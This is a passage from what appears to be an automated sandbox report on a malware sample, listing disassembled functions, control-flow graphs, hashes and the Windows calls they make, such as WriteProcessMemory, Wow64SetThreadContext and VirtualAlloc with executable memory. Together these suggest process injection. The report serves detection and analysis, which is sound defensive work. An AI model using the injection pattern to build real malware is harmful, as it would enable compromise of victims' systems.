                                    APIs
                                    • VirtualProtect.KERNELBASE(?,?,00000040,?), ref: 004361CE
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516137583.0000000000420000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_420000_licarisan_api.jbxd
                                    Similarity
                                    • API ID: ProtectVirtual
                                    • String ID: 2$2$638<$E$P$c$e$e$e$i$o$p$r$s$s$t$x
                                    • API String ID: 544645111-2245852266
                                    • Opcode ID: dd7342a27765a8d856ffa6d0165c118390eaa9d2fb84b38db72164b25d60fec9
                                    • Instruction ID: cada98b8e09c1d7d84a99f5e09ea48f0cff86c0a97af0b5056d015ee8db2dd1f
                                    • Opcode Fuzzy Hash: dd7342a27765a8d856ffa6d0165c118390eaa9d2fb84b38db72164b25d60fec9
                                    • Instruction Fuzzy Hash: EF3221B1C041699FEB20CA14DC94BEA7BB9EB84314F1481FAD80D96241D63D9EC68F52
                                    Function 007EEEF7 Relevance: 24.9, APIs: 1, Strings: 13, Instructions: 393injectionCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 720 7eeef7-7eef02 721 7eef04-7eef40 720->721 722 7eef45-7eefa3 720->722 726 7efa82-7efab7 WriteProcessMemory 721->726 724 7eefb6-7eefcb 722->724 725 7eefa5-7eefb1 722->725 728 7eefde-7eeffd 724->728 729 7eefcd-7eefd9 724->729 727 7ef2a7-7ef2ae 725->727 730 7efabe-7efbf2 726->730 731 7efab9-7f384a call 7f3833 726->731 732 7ef2b4-7ef33f 727->732 733 7ef382-7ef402 call 7ef3f1 727->733 734 7eefff-7ef00b 728->734 735 7ef010-7ef022 728->735 729->727 747 7efbf4-7efbfe 730->747 748 7efc03-7efc4e 730->748 783 7f384c-7f3856 731->783 784 7f385b-7f38a6 call 7f3889 731->784 732->733 761 7ef341-7ef380 call 7ef36f 732->761 733->726 734->727 739 7ef024-7ef030 735->739 740 7ef035-7ef09e 735->740 739->727 749 7ef29b-7ef2a1 740->749 750 7ef0a4-7ef0ee 740->750 755 7efebf-7efed7 call 7efed3 747->755 763 7efc5f-7efcc3 748->763 764 7efc50-7efc5a 748->764 749->727 757 7ef0ff-7ef110 750->757 780 7efed9-7efef8 755->780 765 7ef116-7ef126 757->765 766 7ef1b1-7ef202 757->766 761->733 781 7efcca-7efd91 call 7efcde 763->781 764->755 765->766 773 7ef12c-7ef17d 765->773 768 7ef204-7ef20e 766->768 769 7ef210-7ef267 766->769 777 7ef27f-7ef286 768->777 785 7ef269-7ef273 769->785 786 7ef275 769->786 793 7ef17f-7ef1a1 773->793 794 7ef1a3 773->794 790 7ef288-7ef294 777->790 791 7ef296 777->791 788 7efefe-7effa6 call 7effad 780->788 789 7f080b-7f082a call 7f0823 780->789 831 7efdab-7efdbb 781->831 832 7efd93-7efda9 781->832 795 7f3b17-7f3b44 call 7f3b45 783->795 811 7f38a8-7f38b2 784->811 812 7f38b7-7f38bd 784->812 785->777 786->777 815 7f0831-7f089e 789->815 816 7f082c call 7f0839 789->816 790->727 791->749 793->794 801 7ef1aa 793->801 794->757 801->766 811->795 817 7f38c3-7f391b 812->817 822 7f08af-7f08fa call 7f08d2 815->822 823 7f08a0-7f08aa 815->823 816->815 828 7f3922-7f39e9 817->828 839 7f08fc-7f0906 822->839 840 7f090b-7f09a2 call 7f09a4 822->840 826 7f0b6b-7f0b92 call 7f0b80 call 7f0b93 823->826 847 7f39eb-7f3a01 828->847 848 7f3a03-7f3a13 828->848 831->781 838 7efdc1-7efdd4 831->838 837 7efe0e-7efe15 832->837 841 7efe57-7efe6a call 7efe6b 837->841 842 7efe17-7efe55 837->842 838->781 845 7efdda-7efdea 838->845 839->826 840->826 841->755 842->755 852 7efdec-7efdf6 845->852 853 7efdf8 845->853 855 7f3a66-7f3a6d 847->855 848->828 856 7f3a19-7f3a2c 848->856 859 7efe02-7efe08 852->859 853->859 862 7f3aaf-7f3afb 855->862 863 7f3a6f-7f3a7b call 7f3a7d 855->863 856->828 860 7f3a32-7f3a42 856->860 859->837 864 7f3a44-7f3a4e 860->864 865 7f3a50 860->865 868 7f3b0d 862->868 869 7f3afd-7f3b07 862->869 863->862 870 7f3a5a-7f3a60 864->870 865->870 868->795 869->817 869->868 870->855
                                    APIs
                                    • WriteProcessMemory.KERNELBASE(?,?,?,00000004,?), ref: 007EFAAF
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516559420.00000000007C8000.00000040.00000001.01000000.00000003.sdmp, Offset: 007C8000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7c8000_licarisan_api.jbxd
                                    Similarity
                                    • API ID: MemoryProcessWrite
                                    • String ID: @G<C$E$OP=6$P$c$e$i$o$r$s$s$t$x
                                    • API String ID: 3559483778-673526664
                                    • Opcode ID: 5030c9a201b243907f74f760e8eb10b073daeece213e4f193f3e3e94c1010e9b
                                    • Instruction ID: fda412ac4c514d2e8cb9eb5865bac1542c714f1932bcdc2c052765d25ad3ec31
                                    • Opcode Fuzzy Hash: 5030c9a201b243907f74f760e8eb10b073daeece213e4f193f3e3e94c1010e9b
                                    • Instruction Fuzzy Hash: 74F1BFB1D091A98FEB24CA15CC94BEABBB5AB49304F1440FAD80DA6641C77C9FC5CF51
                                    Function 004355C4 Relevance: 24.8, APIs: 1, Strings: 13, Instructions: 314COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516137583.0000000000420000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_420000_licarisan_api.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: 638<$8A<6$E$P$c$e$i$o$r$s$s$t$x
                                    • API String ID: 0-3819127176
                                    • Opcode ID: aa63ba8fceb8098d81ef153ae89218ce8752a633a92396c0ce7e9adc5efe95d6
                                    • Instruction ID: 5de543b3e8721eaa209909774d6cc212c709b38aa1b7358690f77de5e1f52903
                                    • Opcode Fuzzy Hash: aa63ba8fceb8098d81ef153ae89218ce8752a633a92396c0ce7e9adc5efe95d6
                                    • Instruction Fuzzy Hash: 6DC114B2D046659EE7208A25DC84BEB7BB5EB48314F0480FAD84D97280D67C5EC5CF96
                                    Function 007F1746 Relevance: 23.2, APIs: 1, Strings: 12, Instructions: 406threadCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 1179 7f1746-7f176b 1180 7f17ae-7f180c 1179->1180 1181 7f176d-7f17a9 1179->1181 1182 7f181f-7f1834 1180->1182 1183 7f180e-7f181a 1180->1183 1193 7f22eb-7f2311 Wow64SetThreadContext 1181->1193 1186 7f1847-7f1866 1182->1186 1187 7f1836-7f1842 1182->1187 1185 7f1b10-7f1b17 1183->1185 1191 7f1b1d-7f1ba8 call 7f1b75 1185->1191 1192 7f1beb-7f1c7e call 7f1c53 1185->1192 1189 7f1879-7f188b 1186->1189 1190 7f1868-7f1874 1186->1190 1187->1185 1195 7f189e-7f1907 1189->1195 1196 7f188d-7f1899 1189->1196 1190->1185 1191->1192 1210 7f1baa-7f1be6 call 7f1bc4 1191->1210 1211 7f1c8f-7f1cda 1192->1211 1212 7f1c80-7f1c8a 1192->1212 1199 7f2318-7f384a call 7f3833 1193->1199 1204 7f190d-7f1957 1195->1204 1205 7f1b04-7f1b0a 1195->1205 1196->1185 1243 7f384c-7f3856 1199->1243 1244 7f385b-7f38a6 call 7f3889 1199->1244 1206 7f1968-7f1979 1204->1206 1205->1185 1213 7f197f-7f198f 1206->1213 1214 7f1a1a-7f1a6b 1206->1214 1210->1193 1217 7f1cdc-7f1ce6 1211->1217 1218 7f1ceb-7f1d08 call 7f1d09 1211->1218 1221 7f1f4b-7f1f5d call 7f1f5f 1212->1221 1213->1214 1222 7f1995-7f19e6 call 7f19c3 1213->1222 1219 7f1a6d-7f1a77 1214->1219 1220 7f1a79-7f1ad0 1214->1220 1217->1221 1218->1221 1226 7f1ae8-7f1aef 1219->1226 1228 7f1ade 1220->1228 1229 7f1ad2-7f1adc 1220->1229 1245 7f1a0c 1222->1245 1246 7f19e8-7f1a0a 1222->1246 1235 7f1aff 1226->1235 1236 7f1af1-7f1afd 1226->1236 1228->1226 1229->1226 1235->1205 1236->1185 1247 7f3b17-7f3b44 call 7f3b45 1243->1247 1254 7f38a8-7f38b2 1244->1254 1255 7f38b7-7f38bd 1244->1255 1245->1206 1246->1245 1249 7f1a13 1246->1249 1249->1214 1254->1247 1256 7f38c3-7f391b 1255->1256 1259 7f3922-7f39e9 1256->1259 1263 7f39eb-7f3a01 1259->1263 1264 7f3a03-7f3a13 1259->1264 1265 7f3a66-7f3a6d 1263->1265 1264->1259 1266 7f3a19-7f3a2c 1264->1266 1268 7f3aaf-7f3afb 1265->1268 1269 7f3a6f-7f3a7b call 7f3a7d 1265->1269 1266->1259 1267 7f3a32-7f3a42 1266->1267 1270 7f3a44-7f3a4e 1267->1270 1271 7f3a50 1267->1271 1273 7f3b0d 1268->1273 1274 7f3afd-7f3b07 1268->1274 1269->1268 1275 7f3a5a-7f3a60 1270->1275 1271->1275 1273->1247 1274->1256 1274->1273 1275->1265
                                    APIs
                                    • Wow64SetThreadContext.KERNEL32(?,?), ref: 007F22F9
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516559420.00000000007C8000.00000040.00000001.01000000.00000003.sdmp, Offset: 007C8000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7c8000_licarisan_api.jbxd
                                    Similarity
                                    • API ID: ContextThreadWow64
                                    • String ID: E$OP=6$P$c$e$i$o$r$s$s$t$x
                                    • API String ID: 983334009-1470631180
                                    • Opcode ID: 70a6c4b0ea5559472d3f663d70049be3326f28d021c5136c32376f09f805675e
                                    • Instruction ID: b431c33c28c5aa43ca434696a2d29acac9288408530d30969b799f04617ebee4
                                    • Opcode Fuzzy Hash: 70a6c4b0ea5559472d3f663d70049be3326f28d021c5136c32376f09f805675e
                                    • Instruction Fuzzy Hash: 4EF1DEB1D041A88BEB24CB14CC98BAABBB6EB85314F1480EAD94D66340D7785FC1CF52
                                    Function 004356A8 Relevance: 23.1, APIs: 1, Strings: 12, Instructions: 362memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • VirtualProtect.KERNELBASE(?,?,00000040,?), ref: 004361CE
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516137583.0000000000420000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_420000_licarisan_api.jbxd
                                    Similarity
                                    • API ID: ProtectVirtual
                                    • String ID: 638<$E$P$c$e$i$o$r$s$s$t$x
                                    • API String ID: 544645111-387579111
                                    • Opcode ID: a2d238ec617bb7b6a70fc9ada4adc858b9b8388069ff9584b824b8d4f241cfc3
                                    • Instruction ID: 6ed5b08fcfe76b27a581f46799934f63d6ee110742751e626dd60ceb4e0175b4
                                    • Opcode Fuzzy Hash: a2d238ec617bb7b6a70fc9ada4adc858b9b8388069ff9584b824b8d4f241cfc3
                                    • Instruction Fuzzy Hash: CDE1A0B1D045688BEB24CB14CC94BEBBBB5EB88315F1480EAD84DA7341DA3C9EC58F55
                                    Function 004358F4 Relevance: 22.9, APIs: 1, Strings: 12, Instructions: 194COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516137583.0000000000420000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_420000_licarisan_api.jbxd
                                    Similarity
                                    • API ID: ProtectVirtual
                                    • String ID: 638<$E$P$c$e$i$o$r$s$s$t$x
                                    • API String ID: 544645111-387579111
                                    • Opcode ID: adfd20f61809e02618b6a77d42aa679b5219ee49bc462a75b3bfcef5ce93a7cc
                                    • Instruction ID: b26a1bc0088e7b4754e30e43732aa15a9ec0b4c825e219f5b9ee833f3c41435f
                                    • Opcode Fuzzy Hash: adfd20f61809e02618b6a77d42aa679b5219ee49bc462a75b3bfcef5ce93a7cc
                                    • Instruction Fuzzy Hash: 21613BB2C48664DAF7208615DC44BEB7BB9EB45314F05C0FAD84C96281CA7D5FC58FA2
                                    Function 00435A55 Relevance: 22.9, APIs: 1, Strings: 12, Instructions: 186memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • VirtualProtect.KERNELBASE(?,?,00000040,?), ref: 004361CE
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516137583.0000000000420000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_420000_licarisan_api.jbxd
                                    Similarity
                                    • API ID: ProtectVirtual
                                    • String ID: 638<$E$P$c$e$i$o$r$s$s$t$x
                                    • API String ID: 544645111-387579111
                                    • Opcode ID: 0b80dd6720e2f6e81af6c56a31711255b74131e9c13e64cc9d80159c3bcc86b4
                                    • Instruction ID: d67253d5e8140cee481a5566b8eb97b3f1a6264fef4fead56399c89abb2e45f8
                                    • Opcode Fuzzy Hash: 0b80dd6720e2f6e81af6c56a31711255b74131e9c13e64cc9d80159c3bcc86b4
                                    • Instruction Fuzzy Hash: E06128B2C045949AF7208624DC58BEB7FB8EB45314F04C0FAD84D96281DA7D9EC58FA2
                                    Function 00435973 Relevance: 22.9, APIs: 1, Strings: 12, Instructions: 177memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • VirtualProtect.KERNELBASE(?,?,00000040,?), ref: 004361CE
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516137583.0000000000420000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_420000_licarisan_api.jbxd
                                    Similarity
                                    • API ID: ProtectVirtual
                                    • String ID: 638<$E$P$c$e$i$o$r$s$s$t$x
                                    • API String ID: 544645111-387579111
                                    • Opcode ID: 7f335b916af717871f30b750282fddcbbda243f23f22e8273ef0a4aad74cc13d
                                    • Instruction ID: 49526e54870d8890fe9427392f0551500ae6889d1069737665f52b396b009230
                                    • Opcode Fuzzy Hash: 7f335b916af717871f30b750282fddcbbda243f23f22e8273ef0a4aad74cc13d
                                    • Instruction Fuzzy Hash: 03611AB1C08664DAF720CA15DC44BEB7BB5EB45314F04C0FAD84C96281DA7D5EC58FA2
                                    Function 007AA6D8 Relevance: 21.4, APIs: 1, Strings: 13, Instructions: 372COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516483994.00000000007A5000.00000040.00000001.01000000.00000003.sdmp, Offset: 007A5000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7a5000_licarisan_api.jbxd
                                    Similarity
                                    • API ID: AllocVirtual
                                    • String ID: L$L$W$a$a$b$d$i$j@h$o$r$r$y
                                    • API String ID: 4275171209-1069717143
                                    • Opcode ID: c11aba4442d28daf73e17c8326aa6d842f6710027655167d688ba819fee8047d
                                    • Instruction ID: 7a8b93e79569afa7c60bfb2ce360f7600881bcf61567603e637672bb45212c94
                                    • Opcode Fuzzy Hash: c11aba4442d28daf73e17c8326aa6d842f6710027655167d688ba819fee8047d
                                    • Instruction Fuzzy Hash: AAE1DFA2D042689AE7208B24DC44BEAB775EF96300F1481FAD44DA6681E77D5EC2CF52
                                    Function 007AA901 Relevance: 21.3, APIs: 1, Strings: 13, Instructions: 347memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040,?,?,?,?,?,00000000,007AAE41,?,?,?,?,?), ref: 007AB525
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516483994.00000000007A5000.00000040.00000001.01000000.00000003.sdmp, Offset: 007A5000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7a5000_licarisan_api.jbxd
                                    Similarity
                                    • API ID: AllocVirtual
                                    • String ID: L$L$W$a$a$b$d$i$j@h$o$r$r$y
                                    • API String ID: 4275171209-1069717143
                                    • Opcode ID: c53254e988d3332173246dc15b57400997504fe1bdc36f9d6250ff8814295994
                                    • Instruction ID: 99e1285d9fb397d5eb7ef560e95e0141828ec80eefb178891384239857aaf270
                                    • Opcode Fuzzy Hash: c53254e988d3332173246dc15b57400997504fe1bdc36f9d6250ff8814295994
                                    • Instruction Fuzzy Hash: 94D1BEA2D042689BE7208B24DC45BEAB779EF96300F1481FAD40DA7681E67D5FC18F52
                                    Function 007AA8AF Relevance: 21.2, APIs: 1, Strings: 13, Instructions: 246COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516483994.00000000007A5000.00000040.00000001.01000000.00000003.sdmp, Offset: 007A5000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7a5000_licarisan_api.jbxd
                                    Similarity
                                    • API ID: AllocVirtual
                                    • String ID: L$L$W$a$a$b$d$i$j@h$o$r$r$y
                                    • API String ID: 4275171209-1069717143
                                    • Opcode ID: 8756ebfd6dcfd7046b0bc61c496df5ae97e5933f3534a7cfd9391b20ae29f859
                                    • Instruction ID: 62aa38c919f499d098b77f9fdb5d960e78d2f3322187198f665a189321e39829
                                    • Opcode Fuzzy Hash: 8756ebfd6dcfd7046b0bc61c496df5ae97e5933f3534a7cfd9391b20ae29f859
                                    • Instruction Fuzzy Hash: 8591C3A1D042989FF721CA24DC05BAABB79EF96310F0081FAD44DA7681D6BD5FC18F52
                                    Function 007AA6C0 Relevance: 21.2, APIs: 1, Strings: 13, Instructions: 245COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516483994.00000000007A5000.00000040.00000001.01000000.00000003.sdmp, Offset: 007A5000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7a5000_licarisan_api.jbxd
                                    Similarity
                                    • API ID: AllocVirtual
                                    • String ID: L$L$W$a$a$b$d$i$j@h$o$r$r$y
                                    • API String ID: 4275171209-1069717143
                                    • Opcode ID: 7d25d273a1b16c81526eccc507b30569896d4d3dfc9b7c9df68f6911b48d60f6
                                    • Instruction ID: 3c3320c120e67dfff9d5b242f0611c4fb49e7fb127d5043a3136ebc3872a6724
                                    • Opcode Fuzzy Hash: 7d25d273a1b16c81526eccc507b30569896d4d3dfc9b7c9df68f6911b48d60f6
                                    • Instruction Fuzzy Hash: C891C4A1D042989FF721CA24DC057AA7B79EF96310F0081FAD44DAB681D7BD5BC18F52
                                    Function 007AA681 Relevance: 21.2, APIs: 1, Strings: 13, Instructions: 237COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516483994.00000000007A5000.00000040.00000001.01000000.00000003.sdmp, Offset: 007A5000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7a5000_licarisan_api.jbxd
                                    Similarity
                                    • API ID: AllocVirtual
                                    • String ID: L$L$W$a$a$b$d$i$j@h$o$r$r$y
                                    • API String ID: 4275171209-1069717143
                                    • Opcode ID: e8b037268298a4d5ffb60c49fea98472954899fddb75a8fbe044820a982b3e42
                                    • Instruction ID: 49aa4d250c7f3796afa10eb66a901b421a162617eadf3b2f2087d2a69d55eb0f
                                    • Opcode Fuzzy Hash: e8b037268298a4d5ffb60c49fea98472954899fddb75a8fbe044820a982b3e42
                                    • Instruction Fuzzy Hash: 1291B4A1D042989FF721CA24DC05BAA7779EF96310F0081FAD44DA7681D7BD5BC18F52
                                    Function 0043702B Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 270COMMON
                                    Download Yara Rule
                                    APIs
                                    • ExitProcess.KERNEL32(00000000), ref: 00437BB7
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516137583.0000000000420000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_420000_licarisan_api.jbxd
                                    Similarity
                                    • API ID: ExitProcess
                                    • String ID: N23I
                                    • API String ID: 621844428-2248891880
                                    • Opcode ID: 86a047b82556f0654d6f3208545a0689b5b593e009b7340f098c97802f14d56f
                                    • Instruction ID: 1f2409d8dc3e9cde91ce654f394f12b777bf77407061de83b56be02fb7fcfc23
                                    • Opcode Fuzzy Hash: 86a047b82556f0654d6f3208545a0689b5b593e009b7340f098c97802f14d56f
                                    • Instruction Fuzzy Hash: F1B1B1B1D042689FEB24CB14CC84BEAB775EB88314F1481EAD84967380DA386ED1CF11
                                    Function 007B2413 Relevance: 3.4, APIs: 2, Instructions: 441COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516514758.00000000007B2000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B2000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7b2000_licarisan_api.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: e13bb9705a0713c853c84611bfd16766246ed2ca572bb3cf5f2ca4072feb2abb
                                    • Instruction ID: 2a18fefa57f1885e2f503e8d5d07645eda1b3568d1e675c69a32cb65fe14a38c
                                    • Opcode Fuzzy Hash: e13bb9705a0713c853c84611bfd16766246ed2ca572bb3cf5f2ca4072feb2abb
                                    • Instruction Fuzzy Hash: 19029CB1D052698FEB24CB14CC94BEAB7B5EF85300F1481EAE94DA7241D6386EC2CF51
                                    Function 007A742C Relevance: 3.2, APIs: 2, Instructions: 238libraryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • LoadLibraryW.KERNELBASE(?), ref: 007A778F
                                    • LoadLibraryW.KERNELBASE(FFFFF55C), ref: 007A77AC
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516483994.00000000007A5000.00000040.00000001.01000000.00000003.sdmp, Offset: 007A5000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7a5000_licarisan_api.jbxd
                                    Similarity
                                    • API ID: LibraryLoad
                                    • String ID:
                                    • API String ID: 1029625771-0
                                    • Opcode ID: 94c2ebe60241b45d1ce9fbd4bb7fbdea7d3b05eba24d2260a0f7b65b9ac5590c
                                    • Instruction ID: ea1e00276a1e3f6aa0f40c96282c5d0db8f76cadf96dfec5b6352e2887e65f2a
                                    • Opcode Fuzzy Hash: 94c2ebe60241b45d1ce9fbd4bb7fbdea7d3b05eba24d2260a0f7b65b9ac5590c
                                    • Instruction Fuzzy Hash: 06A1C2B1C096A88BEB24CB24CC447EAB775EF95300F0481E9D44DA7651EA3A5FC5CF62
                                    Function 007A7066 Relevance: 3.2, APIs: 2, Instructions: 228libraryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • LoadLibraryW.KERNELBASE(?), ref: 007A778F
                                    • LoadLibraryW.KERNELBASE(FFFFF55C), ref: 007A77AC
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516483994.00000000007A5000.00000040.00000001.01000000.00000003.sdmp, Offset: 007A5000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7a5000_licarisan_api.jbxd
                                    Similarity
                                    • API ID: LibraryLoad
                                    • String ID:
                                    • API String ID: 1029625771-0
                                    • Opcode ID: 9b3e090531d69dd186d4dee6d3b613c20a064a003945816208054c2b982677ed
                                    • Instruction ID: 2c2d57d448038374d66fdcb1d18eca8a92cad1a133577cc111e41ae296474e4b
                                    • Opcode Fuzzy Hash: 9b3e090531d69dd186d4dee6d3b613c20a064a003945816208054c2b982677ed
                                    • Instruction Fuzzy Hash: 6991A2A1D096A88BEB24CB24CC447EA7774EF91300F0481E9D44DA7642EA7E5FC5CF62
                                    Function 0042E183 Relevance: 1.9, APIs: 1, Instructions: 358nativeCOMMON
                                    Download Yara Rule
                                    APIs
                                    • NtQueryDefaultLocale.NTDLL(00000001,?), ref: 0042EC9A
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516137583.0000000000420000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_420000_licarisan_api.jbxd
                                    Similarity
                                    • API ID: DefaultLocaleQuery
                                    • String ID:
                                    • API String ID: 2949231068-0
                                    • Opcode ID: c5a0a2312dceb3439ecd7d7b18d856ed6c99bcef0e6aa0d43dfaec38c88703bb
                                    • Instruction ID: 14b498a53ca20839f7b89bbcd03554e8a9f3d6d5c484cb62ab93e711ce4bac9b
                                    • Opcode Fuzzy Hash: c5a0a2312dceb3439ecd7d7b18d856ed6c99bcef0e6aa0d43dfaec38c88703bb
                                    • Instruction Fuzzy Hash: CFE19EB1E002288FEB24CB15EC94BEAB7B5FB85304F5441EAD94AA7381D7385ED18E45
                                    Function 0080F2BE Relevance: 1.8, APIs: 1, Instructions: 305COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516916549.00000000007FA000.00000040.00000001.01000000.00000003.sdmp, Offset: 007FA000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7fa000_licarisan_api.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 5bd2ac955688a7fa63ac9ab3a63ad57cb371f02ddb20f86f0cdd73e49e7c16d9
                                    • Instruction ID: 370ffbe4cde878bde6934065ce708e47dd7f33f92b3ae3a6849e6b13322ce7f4
                                    • Opcode Fuzzy Hash: 5bd2ac955688a7fa63ac9ab3a63ad57cb371f02ddb20f86f0cdd73e49e7c16d9
                                    • Instruction Fuzzy Hash: C5C1AFB1E001698FEB64CF14CC95BEAB775FB85314F1481FAD90DA6A81D6389EC1CE41
                                    Function 0042F6C1 Relevance: 1.8, APIs: 1, Instructions: 292nativeCOMMON
                                    Download Yara Rule
                                    APIs
                                    • NtQueryDefaultLocale.NTDLL(00000000,?), ref: 0043025C
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516137583.0000000000420000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_420000_licarisan_api.jbxd
                                    Similarity
                                    • API ID: DefaultLocaleQuery
                                    • String ID:
                                    • API String ID: 2949231068-0
                                    • Opcode ID: 3983c9c8573d178575308bb1f2954925cbf7ffd130db24b8bdd5658839a8f601
                                    • Instruction ID: 12ae1f3055cf662f85ed8df237c81f1b345e697e72a81e690a8c9c1b8b1e48a5
                                    • Opcode Fuzzy Hash: 3983c9c8573d178575308bb1f2954925cbf7ffd130db24b8bdd5658839a8f601
                                    • Instruction Fuzzy Hash: AFC1ABB1E045688BEB24CA14DC50BEABBB5BB85301FA481FAD84DA7641D3385FC6CF45
                                    Function 0042E946 Relevance: 1.8, APIs: 1, Instructions: 267nativeCOMMON
                                    Download Yara Rule
                                    APIs
                                    • NtQueryDefaultLocale.NTDLL(00000001,?), ref: 0042EC9A
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516137583.0000000000420000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_420000_licarisan_api.jbxd
                                    Similarity
                                    • API ID: DefaultLocaleQuery
                                    • String ID:
                                    • API String ID: 2949231068-0
                                    • Opcode ID: a57243a720ab46aeb5c1621d63892e8be7493daecc2f2fd2f639f783efea6b26
                                    • Instruction ID: d0ec39d3d6fb546583dd1d1bff883c75ecbe95c27f1040671e5caf907768c4cb
                                    • Opcode Fuzzy Hash: a57243a720ab46aeb5c1621d63892e8be7493daecc2f2fd2f639f783efea6b26
                                    • Instruction Fuzzy Hash: A4C147B4E052288BEB24CF15DD90BE9B7B6EB84315F5481EAD809A7341D7386ED18F09
                                    Function 0080F0E2 Relevance: 1.7, APIs: 1, Instructions: 231memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • VirtualProtect.KERNELBASE(?,?,00000040,?), ref: 0080FDEA
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516916549.00000000007FA000.00000040.00000001.01000000.00000003.sdmp, Offset: 007FA000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7fa000_licarisan_api.jbxd
                                    Similarity
                                    • API ID: ProtectVirtual
                                    • String ID:
                                    • API String ID: 544645111-0
                                    • Opcode ID: 5deaf237bc3b3815614d68c3dac1b51e16ffab2d257c8addff1b37483f8cfe6e
                                    • Instruction ID: f1125ff632e93b121fd529bde0f29ab5739253cec941f9edebb32c25f2f78222
                                    • Opcode Fuzzy Hash: 5deaf237bc3b3815614d68c3dac1b51e16ffab2d257c8addff1b37483f8cfe6e
                                    • Instruction Fuzzy Hash: 628135B2D10528DAE7748A14EC45BFB7779FB84311F1080FAEA0EA6A81D73D4EC18E51
                                    Function 0042E107 Relevance: 1.7, APIs: 1, Instructions: 202nativeCOMMON
                                    Download Yara Rule
                                    APIs
                                    • NtQueryDefaultLocale.NTDLL(00000001,?), ref: 0042EC9A
                                    Memory Dump Source
